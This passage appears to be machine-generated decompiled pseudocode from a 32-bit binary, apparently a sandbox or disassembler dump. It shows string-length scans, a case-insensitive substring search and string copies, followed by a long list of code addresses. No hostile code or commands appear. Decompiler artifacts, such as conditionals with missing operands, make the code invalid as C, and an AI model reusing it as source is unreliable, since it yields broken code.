												_t316 =  *_t352;
												 *_t450 = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													goto L59;
												}
												_t416 = 0;
												__eflags = 0;
												while(1) {
													_t416 = _t416 + 1;
													_t317 =  *((char*)(_t352 + _t416 * 2 - 1));
													 *(_t450 + _t416 * 2 - 1) = _t317;
													__eflags = _t317;
													if(_t317 == 0) {
														goto L59;
													}
													_t318 =  *((char*)(_t352 + _t416 * 2));
													 *(_t450 + _t416 * 2) = _t318;
													__eflags = _t318;
													if(_t318 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t350;
											if( *_t350 == 0) {
												goto L53;
											}
											_t417 = _t315;
											_t319 = _t350;
											_t63 = _t417 - 0x41; // -65
											_t452 = _t63;
											_v64 = _t452;
											__eflags = _t452 - 0x19;
											_t65 = _t417 + 0x20; // 0x20
											_t354 =  >  ? _t315 : _t65;
											_t245 =  >  ? _t315 : _t65;
											_t355 = 0;
											__eflags = 0;
											while(1) {
												_t286 =  *_t319;
												__eflags = _t286 - 0x41 - 0x19;
												_t287 =  <=  ? _t286 + 0x20 : _t286;
												__eflags = ( <=  ? _t286 + 0x20 : _t286) - _t245;
												if(( <=  ? _t286 + 0x20 : _t286) == _t245) {
													break;
												}
												_t355 = _t355 + 1;
												_t319 = _t319 + 1;
												_t300 = _v60;
												__eflags =  *((char*)(_t355 + _t300));
												if( *((char*)(_t355 + _t300)) != 0) {
													continue;
												}
												L52:
												_t284 = _a4;
												goto L53;
											}
											_t284 = _a4;
											__eflags = _t319;
											if(_t319 == 0) {
												goto L53;
											}
											_t357 = _v28 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t421 =  ~_t357 + 0x10;
											__eflags = _t421;
											_v32 = _t421;
											_v40 = _v48 + 0x20;
											_t246 = _t421;
											do {
												_t422 = _t357;
												__eflags = _t357;
												if(_t357 == 0) {
													L69:
													_t461 =  ~( ~_t422 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t461;
													while(1) {
														asm("movdqu xmm1, [eax+edi]");
														asm("pcmpeqb xmm1, xmm0");
														asm("pmovmskb ebx, xmm1");
														__eflags = _t284;
														if(_t284 != 0) {
															break;
														}
														_t422 = _t422 + 0x10;
														__eflags = _t422 - _t461;
														if(_t422 < _t461) {
															continue;
														}
														__eflags = _t461 - 0x7fffffff;
														if(_t461 >= 0x7fffffff) {
															L76:
															_t461 = 0x7fffffff;
															L77:
															_v68 = _t461;
															_t288 = 0;
															__eflags = 0;
															_v44 = _t357;
															while(1) {
																_t249 =  *((char*)(_t288 + _t319));
																_t359 =  *((char*)(_t288 + _v28));
																__eflags = _t249 - 0x61 - 0x19;
																_t250 =  <=  ? _t249 - 0x20 : _t249;
																__eflags = _t359 - 0x61 - 0x19;
																_t251 =  <=  ? _t249 - 0x20 : _t249;
																_t360 =  <=  ? _t359 - 0x20 : _t359;
																_t361 =  <=  ? _t359 - 0x20 : _t359;
																__eflags = _t251 - ( <=  ? _t359 - 0x20 : _t359);
																if(__eflags < 0 || __eflags > 0) {
																	break;
																}
																__eflags = _t251;
																if(_t251 == 0) {
																	L82:
																	_t357 = _v44;
																	_t466 = _v40;
																	_t284 = _a4;
																	L83:
																	__eflags = _t319;
																	if(_t319 == 0) {
																		goto L53;
																	}
																	_v44 = _t357;
																	while(1) {
																		L85:
																		_t254 = _t319;
																		_t292 = _t319 + 1;
																		__eflags = _t292;
																		if(_t292 == 0) {
																			break;
																		}
																		__eflags =  *(_t319 + 1);
																		if( *(_t319 + 1) == 0) {
																			break;
																		}
																		__eflags = _v64 - 0x19;
																		_t388 =  <=  ? _t466 : _v48;
																		_t389 =  <=  ? _t466 : _v48;
																		_v36 = _t254;
																		_v40 = _t466;
																		while(1) {
																			_t319 = _t319 + 1;
																			_t292 = _t292 + 1;
																			_t266 =  *_t319 & 0x000000ff;
																			_t466 =  *((char*)(_t292 - 1)) + 0xffffffbf;
																			__eflags = _t466 - 0x19;
																			_t267 =  <=  ? _t266 + 0x20 : _t266;
																			__eflags = ( <=  ? _t266 + 0x20 : _t266) - _t389;
																			if(( <=  ? _t266 + 0x20 : _t266) == _t389) {
																				break;
																			}
																			__eflags =  *_t292;
																			if( *_t292 != 0) {
																				continue;
																			}
																			L90:
																			_t254 = _v36;
																			_t365 = _v44;
																			_t284 = _a4;
																			L91:
																			__eflags = _t365;
																			if(_t365 == 0) {
																				L95:
																				_t325 =  ~( ~_t365 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t325;
																				while(1) {
																					asm("movdqu xmm1, [edi+edx]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb esi, xmm1");
																					__eflags = _t466;
																					if(_t466 != 0) {
																						break;
																					}
																					_t365 = _t365 + 0x10;
																					__eflags = _t365 - _t325;
																					if(_t365 < _t325) {
																						continue;
																					}
																					__eflags = _t325 - 0x7fffffff;
																					if(_t325 >= 0x7fffffff) {
																						L102:
																						_t325 = 0x7fffffff;
																						L103:
																						_t468 = _v60 & 0x0000000f;
																						__eflags = _t468;
																						if(_t468 == 0) {
																							L107:
																							_t433 =  ~( ~_t468 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																							__eflags = _t433;
																							while(1) {
																								asm("movdqu xmm1, [ebx+esi]");
																								asm("pcmpeqb xmm1, xmm0");
																								asm("pmovmskb edx, xmm1");
																								__eflags = _t365;
																								if(_t365 != 0) {
																									break;
																								}
																								_t468 = _t468 + 0x10;
																								__eflags = _t468 - _t433;
																								if(_t468 < _t433) {
																									continue;
																								}
																								_t284 = _a4;
																								__eflags = _t433 - 0x7fffffff;
																								if(_t433 >= 0x7fffffff) {
																									L114:
																									_t433 = 0x7fffffff;
																									L115:
																									_t366 = _v60;
																									_t256 = _t254 - _t366 + _t325;
																									_t326 = 0;
																									__eflags = _t256;
																									 *_t284 = 0;
																									_t257 =  <=  ? 0 : _t256;
																									__eflags = _t433 - _t257;
																									 *(_t284 + 4) = 0;
																									_t258 =  <  ? _t433 : _t257;
																									_t434 = _t433 - _t258;
																									_t367 = _t366 + _t258;
																									__eflags = _t367;
																									_v64 = _t367;
																									if(_t367 == 0) {
																										L151:
																										_push(0x40);
																										_t450 = E6EA01030();
																										_t485 = _t485 + 4;
																										_t368 =  *_t284;
																										__eflags = _t368;
																										if(_t368 == 0) {
																											 *_t450 = 0;
																											goto L61;
																										}
																										__eflags = _t450;
																										if(_t450 == 0) {
																											L157:
																											_push(1);
																											_push(_t368);
																											E6EA010B0();
																											_t485 = _t485 + 8;
																											goto L61;
																										}
																										_t327 =  *_t368;
																										 *_t450 = _t327;
																										__eflags = _t327;
																										if(_t327 == 0) {
																											goto L157;
																										}
																										_t435 = 0;
																										__eflags = 0;
																										while(1) {
																											_t435 = _t435 + 1;
																											_t328 =  *((char*)(_t368 + _t435 * 2 - 1));
																											 *(_t450 + _t435 * 2 - 1) = _t328;
																											__eflags = _t328;
																											if(_t328 == 0) {
																												goto L157;
																											}
																											_t329 =  *((char*)(_t368 + _t435 * 2));
																											 *(_t450 + _t435 * 2) = _t329;
																											__eflags = _t329;
																											if(_t329 != 0) {
																												continue;
																											}
																											goto L157;
																										}
																										goto L157;
																									}
																									_t369 = _v60;
																									__eflags =  *(_t369 + _t258);
																									if( *(_t369 + _t258) == 0) {
																										goto L151;
																									}
																									__eflags = _t434;
																									if(_t434 != 0) {
																										L130:
																										_t144 = _t434 + 1; // 0x80000000
																										_t330 = _t144;
																										__eflags = _t330 - 0x40;
																										_t331 =  <=  ? 0x40 : _t330;
																										__eflags = _t331;
																										if(_t331 > 0) {
																											_v68 = (_t331 >> 5 >> 0x1a) + _t331 >> 6;
																											_t332 = _t331 & 0x8000003f;
																											__eflags = _t332;
																											if(_t332 < 0) {
																												_t332 = (_t332 - 0x00000001 | 0xffffffc0) + 1;
																												__eflags = _t332;
																											}
																											__eflags = _t332;
																											_t335 = _v68 + (0 | _t332 > 0x00000000) << 6;
																											_v68 = _t335;
																											_push(_t335);
																											_t469 = E6EA01030();
																											_t485 = _t485 + 4;
																											_t336 =  *_t284;
																											__eflags = _t336;
																											if(_t336 == 0) {
																												 *_t469 = 0;
																												goto L143;
																											} else {
																												__eflags = _t469;
																												if(_t469 == 0) {
																													L141:
																													_push(1);
																													_push(_t336);
																													E6EA010B0();
																													_t485 = _t485 + 8;
																													L143:
																													 *(_t284 + 4) = _v68;
																													 *_t284 = _t469;
																													L144:
																													__eflags = _t469;
																													if(_t469 == 0) {
																														goto L62;
																													}
																													_t262 = _v64;
																													_t337 = 0;
																													while(1) {
																														_t379 =  *_t262;
																														_t337 = _t337 + 1;
																														 *_t469 = _t379;
																														__eflags = _t434;
																														if(_t434 == 0) {
																															goto L149;
																														}
																														__eflags = _t337 - _t434;
																														if(_t337 == _t434) {
																															 *(_t469 + 1) = 0;
																															goto L62;
																														}
																														L149:
																														__eflags = _t379;
																														if(_t379 == 0) {
																															goto L62;
																														}
																														_t469 = _t469 + 1;
																														_t262 = _t262 + 1;
																														__eflags = _t262;
																													}
																												}
																												_t380 =  *_t336;
																												 *_t469 = _t380;
																												__eflags = _t380;
																												if(_t380 == 0) {
																													goto L141;
																												}
																												_t381 = 0;
																												__eflags = 0;
																												while(1) {
																													_t381 = _t381 + 1;
																													_t264 =  *((char*)(_t336 + _t381 * 2 - 1));
																													 *(_t469 + _t381 * 2 - 1) = _t264;
																													__eflags = _t264;
																													if(_t264 == 0) {
																														break;
																													}
																													_t265 =  *((char*)(_t336 + _t381 * 2));
																													 *(_t469 + _t381 * 2) = _t265;
																													__eflags = _t265;
																													if(_t265 != 0) {
																														continue;
																													}
																													break;
																												}
																												_t284 = _a4;
																												goto L141;
																											}
																										}
																										_t469 = 0;
																										goto L144;
																									}
																									_t382 = _t369 + _t258;
																									_v60 = _t382;
																									_t383 = _t382 & 0x0000000f;
																									__eflags = _t383;
																									if(_t383 == 0) {
																										L122:
																										_t434 =  ~( ~_t383 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																										__eflags = _t434;
																										while(1) {
																											asm("movdqu xmm1, [esi+edx]");
																											asm("pcmpeqb xmm1, xmm0");
																											asm("pmovmskb ecx, xmm1");
																											__eflags = _t326;
																											if(_t326 != 0) {
																												break;
																											}
																											_t383 = _t383 + 0x10;
																											__eflags = _t383 - _t434;
																											if(_t383 < _t434) {
																												continue;
																											}
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 >= 0x7fffffff) {
																												L129:
																												_t434 = 0x7fffffff;
																												goto L130;
																											}
																											_t384 = _v60;
																											while(1) {
																												__eflags =  *((char*)(_t434 + _t384));
																												if( *((char*)(_t434 + _t384)) == 0) {
																													goto L130;
																												}
																												_t434 = _t434 + 1;
																												__eflags = _t434 - 0x7fffffff;
																												if(_t434 < 0x7fffffff) {
																													continue;
																												}
																												goto L129;
																											}
																											goto L130;
																										}
																										asm("bsf edi, ecx");
																										_t434 = _t434 + _t383;
																										goto L130;
																									}
																									_t434 = 0;
																									_t326 = _v60;
																									_t383 =  ~_t383 + 0x10;
																									__eflags = _t383;
																									while(1) {
																										__eflags =  *((char*)(_t434 + _t326));
																										if( *((char*)(_t434 + _t326)) == 0) {
																											goto L130;
																										}
																										_t434 = _t434 + 1;
																										__eflags = _t434 - _t383;
																										if(_t434 < _t383) {
																											continue;
																										}
																										goto L122;
																									}
																									goto L130;
																								}
																								_t386 = _v60;
																								while(1) {
																									__eflags =  *((char*)(_t433 + _t386));
																									if( *((char*)(_t433 + _t386)) == 0) {
																										goto L115;
																									}
																									_t433 = _t433 + 1;
																									__eflags = _t433 - 0x7fffffff;
																									if(_t433 < 0x7fffffff) {
																										continue;
																									}
																									goto L114;
																								}
																								goto L115;
																							}
																							asm("bsf edi, edx");
																							_t284 = _a4;
																							_t433 = _t433 + _t468;
																							goto L115;
																						}
																						_t433 = 0;
																						_t365 = _v60;
																						_t468 =  ~_t468 + 0x10;
																						__eflags = _t468;
																						while(1) {
																							__eflags =  *((char*)(_t433 + _t365));
																							if( *((char*)(_t433 + _t365)) == 0) {
																								goto L115;
																							}
																							_t433 = _t433 + 1;
																							__eflags = _t433 - _t468;
																							if(_t433 < _t468) {
																								continue;
																							}
																							goto L107;
																						}
																						goto L115;
																					}
																					_t365 = _v28;
																					while(1) {
																						__eflags =  *(_t325 + _t365);
																						if( *(_t325 + _t365) == 0) {
																							goto L103;
																						}
																						_t325 = _t325 + 1;
																						__eflags = _t325 - 0x7fffffff;
																						if(_t325 < 0x7fffffff) {
																							continue;
																						}
																						goto L102;
																					}
																					goto L103;
																				}
																				asm("bsf ecx, esi");
																				_t325 = _t325 + _t365;
																				goto L103;
																			}
																			_t365 = _v32;
																			_t325 = 0;
																			__eflags = 0;
																			_t441 = _v28;
																			_t466 = _t365;
																			while(1) {
																				__eflags =  *((char*)(_t325 + _t441));
																				if( *((char*)(_t325 + _t441)) == 0) {
																					goto L103;
																				}
																				_t325 = _t325 + 1;
																				__eflags = _t325 - _t466;
																				if(_t325 < _t466) {
																					continue;
																				}
																				goto L95;
																			}
																			goto L103;
																		}
																		_t254 = _v36;
																		_t466 = _v40;
																		__eflags = _t319;
																		if(_t319 == 0) {
																			break;
																		}
																		_v36 = _t254;
																		_v40 = _t466;
																		_t390 = _v44;
																		_t268 = _v32;
																		do {
																			_t443 = _t390;
																			__eflags = _t390;
																			if(_t390 == 0) {
																				L169:
																				_t478 =  ~( ~_t443 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																				__eflags = _t478;
																				while(1) {
																					asm("movdqu xmm1, [eax+edi]");
																					asm("pcmpeqb xmm1, xmm0");
																					asm("pmovmskb ebx, xmm1");
																					__eflags = _t292;
																					if(_t292 != 0) {
																						break;
																					}
																					_t443 = _t443 + 0x10;
																					__eflags = _t443 - _t478;
																					if(_t443 < _t478) {
																						continue;
																					}
																					__eflags = _t478 - 0x7fffffff;
																					if(_t478 >= 0x7fffffff) {
																						L176:
																						_t478 = 0x7fffffff;
																						L177:
																						_v68 = _t478;
																						_t295 = 0;
																						__eflags = 0;
																						_v44 = _t390;
																						while(1) {
																							_t271 =  *((char*)(_t295 + _t319));
																							_t392 =  *((char*)(_t295 + _v28));
																							__eflags = _t271 - 0x61 - 0x19;
																							_t272 =  <=  ? _t271 - 0x20 : _t271;
																							__eflags = _t392 - 0x61 - 0x19;
																							_t273 =  <=  ? _t271 - 0x20 : _t271;
																							_t393 =  <=  ? _t392 - 0x20 : _t392;
																							_t394 =  <=  ? _t392 - 0x20 : _t392;
																							__eflags = _t273 - ( <=  ? _t392 - 0x20 : _t392);
																							if(__eflags < 0 || __eflags > 0) {
																								break;
																							}
																							__eflags = _t273;
																							if(_t273 == 0) {
																								L182:
																								_t254 = _v36;
																								_t466 = _v40;
																								L183:
																								__eflags = _t319;
																								if(_t319 != 0) {
																									goto L85;
																								}
																								goto L184;
																							}
																							_t295 = _t295 + 1;
																							__eflags = _t295 - _v68;
																							if(_t295 < _v68) {
																								continue;
																							}
																							goto L182;
																						}
																						_t365 = _v44;
																						_t466 = _t319 + 1;
																						__eflags = _t466;
																						if(_t466 == 0) {
																							goto L192;
																						}
																						__eflags = _v64 - 0x19;
																						_t297 =  <=  ? _v40 : _v48;
																						_t292 =  <=  ? _v40 : _v48;
																						__eflags =  *(_t319 + 1);
																						if( *(_t319 + 1) == 0) {
																							goto L192;
																						}
																						_v44 = _t365;
																						while(1) {
																							_t319 = _t319 + 1;
																							_t466 = _t466 + 1;
																							_t395 =  *_t319 & 0x000000ff;
																							__eflags =  *((char*)(_t466 - 1)) + 0xffffffbf - 0x19;
																							_t396 =  <=  ? _t395 + 0x20 : _t395;
																							__eflags = ( <=  ? _t395 + 0x20 : _t395) - _t292;
																							if(( <=  ? _t395 + 0x20 : _t395) == _t292) {
																								goto L191;
																							}
																							__eflags =  *_t466;
																							if( *_t466 != 0) {
																								continue;
																							}
																							goto L90;
																						}
																						goto L191;
																					}
																					_t298 = _v28;
																					while(1) {
																						__eflags =  *((char*)(_t478 + _t298));
																						if( *((char*)(_t478 + _t298)) == 0) {
																							break;
																						}
																						_t478 = _t478 + 1;
																						__eflags = _t478 - 0x7fffffff;
																						if(_t478 < 0x7fffffff) {
																							continue;
																						}
																						goto L176;
																					}
																					L193:
																					__eflags = _t478;
																					if(__eflags == 0) {
																						goto L176;
																					}
																					if(__eflags > 0) {
																						goto L177;
																					}
																					_v44 = _t390;
																					_t254 = _v36;
																					_t466 = _v40;
																					goto L183;
																				}
																				asm("bsf esi, ebx");
																				_t478 = _t478 + _t443;
																				goto L193;
																			}
																			_t292 = _v28;
																			_t443 = _t268;
																			_t478 = 0;
																			__eflags = 0;
																			while(1) {
																				__eflags =  *((char*)(_t478 + _t292));
																				if( *((char*)(_t478 + _t292)) == 0) {
																					goto L193;
																				}
																				_t478 = _t478 + 1;
																				__eflags = _t478 - _t268;
																				if(_t478 < _t268) {
																					continue;
																				}
																				goto L169;
																			}
																			goto L193;
																			L191:
																			_t390 = _v44;
																			_t268 = _v32;
																			__eflags = _t319;
																		} while (_t319 != 0);
																		L192:
																		_t254 = _v36;
																		_t284 = _a4;
																		goto L91;
																	}
																	L184:
																	_t365 = _v44;
																	goto L91;
																}
																_t288 = _t288 + 1;
																__eflags = _t288 - _v68;
																if(_t288 < _v68) {
																	continue;
																}
																goto L82;
															}
															_t362 = _v44;
															_t465 = _t319 + 1;
															__eflags = _t465;
															if(_t465 == 0) {
																goto L52;
															}
															__eflags = _v64 - 0x19;
															_t290 =  <=  ? _v40 : _v48;
															_t284 =  <=  ? _v40 : _v48;
															__eflags =  *(_t319 + 1);
															if( *(_t319 + 1) == 0) {
																goto L52;
															}
															_v44 = _t362;
															while(1) {
																_t319 = _t319 + 1;
																_t465 = _t465 + 1;
																_t363 =  *_t319 & 0x000000ff;
																__eflags =  *((char*)(_t465 - 1)) + 0xffffffbf - 0x19;
																_t364 =  <=  ? _t363 + 0x20 : _t363;
																__eflags = ( <=  ? _t363 + 0x20 : _t363) - _t284;
																if(( <=  ? _t363 + 0x20 : _t363) == _t284) {
																	goto L207;
																}
																__eflags =  *_t465;
																if( *_t465 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L207;
														}
														_t299 = _v28;
														while(1) {
															__eflags =  *((char*)(_t461 + _t299));
															if( *((char*)(_t461 + _t299)) == 0) {
																break;
															}
															_t461 = _t461 + 1;
															__eflags = _t461 - 0x7fffffff;
															if(_t461 < 0x7fffffff) {
																continue;
															}
															goto L76;
														}
														L203:
														__eflags = _t461;
														if(__eflags == 0) {
															goto L76;
														}
														if(__eflags > 0) {
															goto L77;
														}
														_t466 = _v40;
														_t284 = _a4;
														goto L83;
													}
													asm("bsf esi, ebx");
													_t461 = _t461 + _t422;
													goto L203;
												}
												_t284 = _v28;
												_t422 = _t246;
												_t461 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t461 + _t284));
													if( *((char*)(_t461 + _t284)) == 0) {
														goto L203;
													}
													_t461 = _t461 + 1;
													__eflags = _t461 - _t246;
													if(_t461 < _t246) {
														continue;
													}
													goto L69;
												}
												goto L203;
												L207:
												_t357 = _v44;
												_t246 = _v32;
												__eflags = _t319;
											} while (_t319 != 0);
											goto L52;
										}
										goto L39;
									}
									_t279 =  *_t344;
									 *_t311 = _t279;
									__eflags = _t279;
									if(_t279 == 0) {
										goto L33;
									}
									_v60 = _t413;
									_t280 = 0;
									__eflags = 0;
									_v64 = _t283;
									_v68 = _t449;
									while(1) {
										_t280 = _t280 + 1;
										_t301 =  *((char*)(_t344 + _t280 * 2 - 1));
										 *(_t311 + _t280 * 2 - 1) = _t301;
										__eflags = _t301;
										if(_t301 == 0) {
											break;
										}
										_t302 =  *((char*)(_t344 + _t280 * 2));
										 *(_t311 + _t280 * 2) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											continue;
										}
										break;
									}
									_t413 = _v60;
									_t283 = _v64;
									_t449 = _v68;
									goto L33;
								}
							}
							_t311 = _v56;
							goto L36;
						}
						_t400 = _t406 & 0x0000000f;
						__eflags = _t400;
						if(_t400 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t308 =  ~( ~_t400 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t308;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t231;
								if(_t231 != 0) {
									break;
								}
								_t400 = _t400 + 0x10;
								__eflags = _t400 - _t308;
								if(_t400 < _t308) {
									continue;
								}
								__eflags = _t308 - 0x7fffffff;
								if(_t308 >= 0x7fffffff) {
									L21:
									_t310 = 0x40;
									_t283 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t308 + _t406));
									if( *((char*)(_t308 + _t406)) == 0) {
										break;
									}
									_t308 = _t308 + 1;
									__eflags = _t308 - 0x7fffffff;
									if(_t308 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L209:
								__eflags = _t283 - 0xfffffffe;
								if(_t283 != 0xfffffffe) {
									_t310 = 0x40;
								} else {
									 *_t406 = 0;
									_t310 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t283 = _t308 + _t400;
							goto L209;
						}
						_t283 = 0;
						_t400 =  ~_t400 + 0x10;
						__eflags = _t400;
						while(1) {
							__eflags =  *((char*)(_t283 + _t406));
							if( *((char*)(_t283 + _t406)) == 0) {
								goto L209;
							}
							_t283 = _t283 + 1;
							__eflags = _t283 - _t400;
							if(_t283 < _t400) {
								continue;
							}
							goto L15;
						}
						goto L209;
					}
					_t237 =  &_v56;
					goto L37;
				}
				if(_t406 == 0) {
					L6:
					_push(1);
					_push(_t230);
					E6EA010B0();
					_t485 = _t485 + 8;
					goto L8;
				}
				_t402 =  *_t230;
				 *_t406 = _t402;
				if(_t402 == 0) {
					goto L6;
				}
				_t340 = 0;
				while(1) {
					_t340 = _t340 + 1;
					_t403 =  *((char*)(_t230 + _t340 * 2 - 1));
					 *((char*)(_t406 + _t340 * 2 - 1)) = _t403;
					if(_t403 == 0) {
						goto L6;
					}
					_t404 =  *((char*)(_t230 + _t340 * 2));
					 *((char*)(_t406 + _t340 * 2)) = _t404;
					if(_t404 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6ea12e6e
0x6ea12e72
0x6ea12e74
0x6ea12e78
0x6ea12e7f
0x6ea12e81
0x6ea12e84
0x6ea12e8a
0x6ea12ec1
0x6ea12ec4
0x6ea12ec4
0x6ea12ec8
0x6ea12ed0
0x6ea12ed6
0x6ea12ee1
0x6ea12ee3
0x6ea137d3
0x6ea137d8
0x6ea12f5d
0x6ea12f62
0x6ea12f62
0x6ea12f65
0x6ea12f68
0x6ea12f6b
0x6ea12f6d
0x6ea12f82
0x6ea12f85
0x6ea12f85
0x6ea12f8b
0x6ea12f93
0x6ea12f93
0x6ea12f93
0x6ea12f96
0x6ea12f9d
0x6ea12fa0
0x6ea12fa6
0x6ea12fa8
0x6ea12fab
0x6ea12faf
0x6ea12fb1
0x6ea13006
0x00000000
0x6ea12fb3
0x6ea12fb3
0x6ea12fb5
0x6ea12ff1
0x6ea12ff1
0x6ea12ff3
0x6ea12ff4
0x6ea12ff8
0x6ea12ffd
0x6ea13001
0x6ea13009
0x6ea13009
0x6ea1300d
0x6ea13011
0x6ea13015
0x6ea13018
0x6ea1301e
0x6ea13023
0x6ea13023
0x6ea13025
0x6ea13029
0x6ea1302e
0x6ea1303d
0x6ea1303d
0x6ea13041
0x6ea13043
0x6ea1304b
0x6ea1304d
0x6ea13050
0x6ea13054
0x6ea1308e
0x6ea13135
0x6ea13135
0x6ea13137
0x6ea1313e
0x6ea1313e
0x6ea13140
0x6ea13144
0x6ea13150
0x6ea13154
0x6ea13161
0x6ea13161
0x6ea13058
0x6ea1307e
0x6ea1307e
0x6ea13080
0x6ea13081
0x6ea13086
0x00000000
0x6ea13086
0x6ea1305a
0x6ea1305d
0x6ea13061
0x00000000
0x00000000
0x6ea13063
0x6ea13065
0x6ea13065
0x6ea13066
0x6ea1306b
0x6ea13071
0x00000000
0x00000000
0x6ea13073
0x6ea13077
0x6ea1307c
0x00000000
0x00000000
0x00000000
0x6ea1307c
0x00000000
0x6ea13065
0x6ea13032
0x6ea13035
0x6ea1303b
0x6ea13096
0x6ea13098
0x6ea1309c
0x6ea1309e
0x6ea130e4
0x6ea130e4
0x6ea130e8
0x6ea130ea
0x6ea130f2
0x6ea130f4
0x6ea130f7
0x6ea130f9
0x6ea130fb
0x6ea13132
0x00000000
0x6ea13132
0x6ea130fd
0x6ea130ff
0x6ea13125
0x6ea13125
0x6ea13127
0x6ea13128
0x6ea1312d
0x00000000
0x6ea1312d
0x6ea13101
0x6ea13104
0x6ea13106
0x6ea13108
0x00000000
0x00000000
0x6ea1310a
0x6ea1310a
0x6ea1310c
0x6ea1310c
0x6ea1310d
0x6ea13112
0x6ea13116
0x6ea13118
0x00000000
0x00000000
0x6ea1311a
0x6ea1311e
0x6ea13121
0x6ea13123
0x00000000
0x00000000
0x00000000
0x6ea13123
0x00000000
0x6ea1310c
0x6ea130a0
0x6ea130a3
0x00000000
0x00000000
0x6ea130a5
0x6ea130a7
0x6ea130a9
0x6ea130a9
0x6ea130ac
0x6ea130b0
0x6ea130b3
0x6ea130b6
0x6ea130b9
0x6ea130bc
0x6ea130bc
0x6ea130be
0x6ea130be
0x6ea130c4
0x6ea130ca
0x6ea130cd
0x6ea130cf
0x00000000
0x00000000
0x6ea130d5
0x6ea130d6
0x6ea130d7
0x6ea130db
0x6ea130df
0x00000000
0x00000000
0x6ea130e1
0x6ea130e1
0x00000000
0x6ea130e1
0x6ea13164
0x6ea13167
0x6ea13169
0x00000000
0x00000000
0x6ea13173
0x6ea13176
0x6ea13182
0x6ea13182
0x6ea13185
0x6ea1318c
0x6ea13190
0x6ea13192
0x6ea13192
0x6ea13194
0x6ea13196
0x6ea131af
0x6ea131bf
0x6ea131bf
0x6ea131c5
0x6ea131c5
0x6ea131ca
0x6ea131ce
0x6ea131d2
0x6ea131d4
0x00000000
0x00000000
0x6ea131da
0x6ea131dd
0x6ea131df
0x00000000
0x00000000
0x6ea131e5
0x6ea131eb
0x6ea13204
0x6ea13204
0x6ea13209
0x6ea13209
0x6ea1320c
0x6ea1320c
0x6ea1320e
0x6ea13212
0x6ea13216
0x6ea1321a
0x6ea13221
0x6ea1322a
0x6ea1322d
0x6ea13230
0x6ea13236
0x6ea13239
0x6ea1323c
0x6ea1323e
0x00000000
0x00000000
0x6ea1324a
0x6ea1324c
0x6ea13254
0x6ea13254
0x6ea13258
0x6ea1325c
0x6ea1325f
0x6ea1325f
0x6ea13261
0x00000000
0x00000000
0x6ea13267
0x6ea1326b
0x6ea1326b
0x6ea1326d
0x6ea1326f
0x6ea1326f
0x6ea13270
0x00000000
0x00000000
0x6ea13276
0x6ea1327a
0x00000000
0x00000000
0x6ea13280
0x6ea13289
0x6ea1328c
0x6ea1328f
0x6ea13293
0x6ea13297
0x6ea13297
0x6ea13298
0x6ea13299
0x6ea132a0
0x6ea132a3
0x6ea132a9
0x6ea132ac
0x6ea132ae
0x00000000
0x00000000
0x6ea132b4
0x6ea132b7
0x00000000
0x00000000
0x6ea132b9
0x6ea132b9
0x6ea132bd
0x6ea132c1
0x6ea132c4
0x6ea132c4
0x6ea132c6
0x6ea132df
0x6ea132ef
0x6ea132ef
0x6ea132f5
0x6ea132f5
0x6ea132fa
0x6ea132fe
0x6ea13302
0x6ea13304
0x00000000
0x00000000
0x6ea1330a
0x6ea1330d
0x6ea1330f
0x00000000
0x00000000
0x6ea13311
0x6ea13317
0x6ea1332c
0x6ea1332c
0x6ea13331
0x6ea13335
0x6ea13335
0x6ea13338
0x6ea13350
0x6ea13360
0x6ea13360
0x6ea13366
0x6ea13366
0x6ea1336b
0x6ea1336f
0x6ea13373
0x6ea13375
0x00000000
0x00000000
0x6ea1337b
0x6ea1337e
0x6ea13380
0x00000000
0x00000000
0x6ea13382
0x6ea13385
0x6ea1338b
0x6ea133a0
0x6ea133a0
0x6ea133a5
0x6ea133a5
0x6ea133ab
0x6ea133ad
0x6ea133af
0x6ea133b1
0x6ea133b3
0x6ea133b6
0x6ea133b8
0x6ea133bb
0x6ea133be
0x6ea133c0
0x6ea133c0
0x6ea133c2
0x6ea133c6
0x6ea13519
0x6ea13519
0x6ea13520
0x6ea13522
0x6ea13525
0x6ea13527
0x6ea13529
0x6ea13563
0x00000000
0x6ea13563
0x6ea1352b
0x6ea1352d
0x6ea13553
0x6ea13553
0x6ea13555
0x6ea13556
0x6ea1355b
0x00000000
0x6ea1355b
0x6ea1352f
0x6ea13532
0x6ea13534
0x6ea13536
0x00000000
0x00000000
0x6ea13538
0x6ea13538
0x6ea1353a
0x6ea1353a
0x6ea1353b
0x6ea13540
0x6ea13544
0x6ea13546
0x00000000
0x00000000
0x6ea13548
0x6ea1354c
0x6ea1354f
0x6ea13551
0x00000000
0x00000000
0x00000000
0x6ea13551
0x00000000
0x6ea1353a
0x6ea133cc
0x6ea133d0
0x6ea133d4
0x00000000
0x00000000
0x6ea133da
0x6ea133dc
0x6ea13451
0x6ea13456
0x6ea13456
0x6ea13459
0x6ea1345c
0x6ea1345f
0x6ea13461
0x6ea13477
0x6ea1347a
0x6ea1347a
0x6ea13480
0x6ea13488
0x6ea13488
0x6ea13488
0x6ea1348b
0x6ea13495
0x6ea13498
0x6ea1349b
0x6ea134a1
0x6ea134a3
0x6ea134a6
0x6ea134a8
0x6ea134aa
0x6ea134e4
0x00000000
0x6ea134ac
0x6ea134ac
0x6ea134ae
0x6ea134d7
0x6ea134d7
0x6ea134d9
0x6ea134da
